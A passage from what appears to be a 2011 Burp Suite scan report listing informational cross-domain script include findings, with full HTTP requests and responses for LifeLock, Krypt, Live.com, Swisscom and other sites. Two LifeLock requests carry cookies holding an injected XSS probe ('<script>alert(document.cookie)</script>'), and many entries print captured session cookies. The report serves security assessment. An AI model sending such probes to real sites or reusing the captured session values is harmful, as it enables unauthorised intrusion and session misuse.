Set-Cookie: C2=MMBtN5pqHIxFGQoovgg3sYQKSKMCItdxUhQ3WXMVIMa4FTFCKGexUhQ3gZMV1qKCaMrBpU7qIEysGTVkBgAoNXUVmZOiGgasjgAbUaUVNSPC73cBwB; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: F1=BwwE02kAAAAABq5CAEAAEBABAAAABAAAAMAAEBA; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: BASE=RgwqoyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nm47UK47HID!; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: ROLL=boAnv2y2JFBgWE4zf7nzuD5wX65V4u/meZRpXwKuwebwa4PtYFhaQQG!; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: 53765754=_4db4130c,4224517685,801362^894875^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 24 Apr 2011 12:09:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000801362/mnum=0000894875/cstr=53765754=_4db4130c,4224517685,801362^894875^1183^0,1_/xsxdata=$xsxdata/bnum=53765754/optn=64?trg="><\/script>
...[SNIP]...

24.188. http://reputation-watch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reputation-watch.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: reputation-watch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://reputation-watch.com/xmlrpc.php
Link: <http://bit.ly/hGN7o2>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 41655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
<body>
<script type='text/javascript' src='http://track3.mybloglog.com/js/jsserv.php?mblID=2008013116011951'></script>
...[SNIP]...

24.189. http://reputation-watch.com/wp-content/themes/3col-kubrick/images/kubrickheader.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reputation-watch.com
Path:   /wp-content/themes/3col-kubrick/images/kubrickheader.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/themes/3col-kubrick/images/kubrickheader.jpg HTTP/1.1
Host: reputation-watch.com
Proxy-Connection: keep-alive
Referer: http://reputation-watch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=104716291.1303691628.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=104716291.551480140.1303691628.1303691628.1303691628.1; __utmc=104716291; __utmb=104716291.2.10.1303691628

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 00:34:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://reputation-watch.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 25 Apr 2011 00:34:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 21103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
<body>
<script type='text/javascript' src='http://track3.mybloglog.com/js/jsserv.php?mblID=2008013116011951'></script>
...[SNIP]...

24.190. https://secure.krypt.com/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /cart/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cart/?customize HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 16:39:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:39:24 GMT; path=/; domain=.krypt.com
Location: /order/customize.html?index=2
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 20084


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - View Ca
...[SNIP]...
<!-- Start Javascript -->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vpls"></script>
...[SNIP]...

24.191. https://secure.krypt.com/checkout/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /checkout/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkout/ HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: https://secure.krypt.com/order/customize.html?index=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:40:14 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:40:18 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32356


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Complet
...[SNIP]...
<!-- Start Javascript -->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vpls"></script>
...[SNIP]...

24.192. https://secure.krypt.com/order/customize.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /order/customize.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /order/customize.html?index=1 HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:38:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:38:28 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 48123

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Customiz
...[SNIP]...
<!-- Start Javascript -->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vpls"></script>
...[SNIP]...

24.193. https://secure.lifelock.com/enrollment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /enrollment

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /enrollment?promocode=next&uid=945440258CD1 HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:01 GMT
Set-Cookie: promoCode=NEXT; Expires=Mon, 25-Apr-2011 03:10:01 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:25:01 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461; Path=/
Vary: Accept-Encoding
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LifeLock.com - E
...[SNIP]...
<![endif]-->
   
   <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<div class="verisign">
                   <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=secure.lifelock.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
<!-- start of keywordmax pixel -->
   <script language="JavaScript" type="text/javascript" defer="1" src="https://keywordmax.com/tracking/show.php?id=661075270&location=Homepage"></script>
...[SNIP]...
</noscript>
   
   <script type="text/javascript" src="https://www.upsellit.com/upsellitJS4.jsp?qs=219200253218308279346322312294346330342296304274294273324291&siteID=1353"></script>

   <script type="text/javascript" src="https://www.upsellit.com/cookie.jsp?value=seenSession&maxAge=86400&siteID=1353"></script>
...[SNIP]...

24.194. https://secure.lifelock.com/enrollment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /enrollment/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /enrollment/ HTTP/1.1
Host: secure.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-PV=3114#4/24/2011/2/56/45; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; __utmb=182152376.7.10.1303613800; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; isWebstoreEnrollmentPage=true; promoCode=NEXT; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:56:07 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 17:11:07 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=2fac6d3ef891d6bc8f6be2ddc70c080c945c3cbfd48195b84db45627; Path=/
Vary: Accept-Encoding
Content-Length: 25812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LifeLock.com - E
...[SNIP]...
<![endif]-->
   
   <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<div class="verisign">
                   <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=secure.lifelock.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
<!-- start of keywordmax pixel -->
   <script language="JavaScript" type="text/javascript" defer="1" src="https://keywordmax.com/tracking/show.php?id=661075270&location=Homepage"></script>
...[SNIP]...
</noscript>
   
   <script type="text/javascript" src="https://www.upsellit.com/upsellitJS4.jsp?qs=219200253218308279346322312294346330342296304274294273324291&siteID=1353"></script>

   <script type="text/javascript" src="https://www.upsellit.com/cookie.jsp?value=seenSession&maxAge=86400&siteID=1353"></script>
...[SNIP]...

24.195. https://secure.lifelock.com/portal/account-reset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/account-reset

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portal/account-reset HTTP/1.1
Host: secure.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-PV=3114#4/24/2011/2/56/45; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; __utmb=182152376.7.10.1303613800; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; isWebstoreEnrollmentPage=true; promoCode=NEXT; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:42 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Set-Cookie: isWebstoreEnrollmentPage=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Content-Length: 3714
Expires: Sun, 24 Apr 2011 17:10:42 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=692fab84250b2cb5007b0012b4fc7e60945c3cbfd48195b84db4560e; Path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>myLifeLock - Account Reset</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" media="sc
...[SNIP]...
<link rel="shortcut icon" href="../favicon.ico"/>
       <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

24.196. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Set-Cookie: JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<link rel="shortcut icon" href="../favicon.ico"/>
       <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

24.197. https://security.live.com/LoginStage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 25919
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-UA-Compatible: IE=7
Set-Cookie: ASP.NET_SessionId=ucdfqwzg0orvw3jxqhywn2mz; path=/; HttpOnly
Set-Cookie: xid=b79f02fa-b994-43d5-a76d-1fdbf35adae9&&BAYxxxxxxx1D05&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=930347861&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.security.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sun, 24-Apr-2011 15:16:18 GMT; path=/
Set-Cookie: wlv=A|_-d:s*stM6Bg.2+1+0+3; domain=.live.com; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: E=P:tuRFqrfQzYg=:2A86sT3CApx4bD1TSQD2FQiQePyCL8+HQuLs/qy4iBg=:F; domain=.live.com; path=/
PPServer: PPV: 30 H: BAYIDSTOOL1D05 V: 0
Date: Sun, 24 Apr 2011 16:56:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.wlxrs.com/UTvyLWe4NTcjsg1fWir74g/liteframework.js" ></script>
...[SNIP]...

24.198. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Category/Category.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://en.swisscom.ch/residential
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:51:11 GMT
Set-Cookie: JSESSIONID=9C1CE7D6C83E6C0ED19CE872CAA1A725; Path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 76582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<div id="ctl00_contentPlaceholderHeader_headerControl_ExternalHeaderContent" class="ContentExternalHeader">
<script src="http://www.bluewin.ch/js/osn/osn_header.js" type="text/javascript"></script>
...[SNIP]...
<div class="FullBanner"><script src="http://de.swisscom.ch/js/swfobject.js" type="text/javascript">
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUti
...[SNIP]...
</script>
<script src="http://sc.swisscom.ch/js/osn/s_one_code.js" type="text/javascript" ></script>
...[SNIP]...

24.199. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductConfig/ProductConfig.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=&id=1000299810 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=&id=1000299810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671316799-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/products%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:55:06 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 72396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
    Swisscom
...[SNIP]...
<div id="ctl00_contentPlaceholderHeader_headerControl_ExternalHeaderContent" class="ContentExternalHeader">
<script src="http://www.bluewin.ch/js/osn/osn_header.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://sc.swisscom.ch/js/osn/s_one_code.js" type="text/javascript" ></script>
...[SNIP]...

24.200. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductDetail/ProductDetail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductDetail/ProductDetail.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

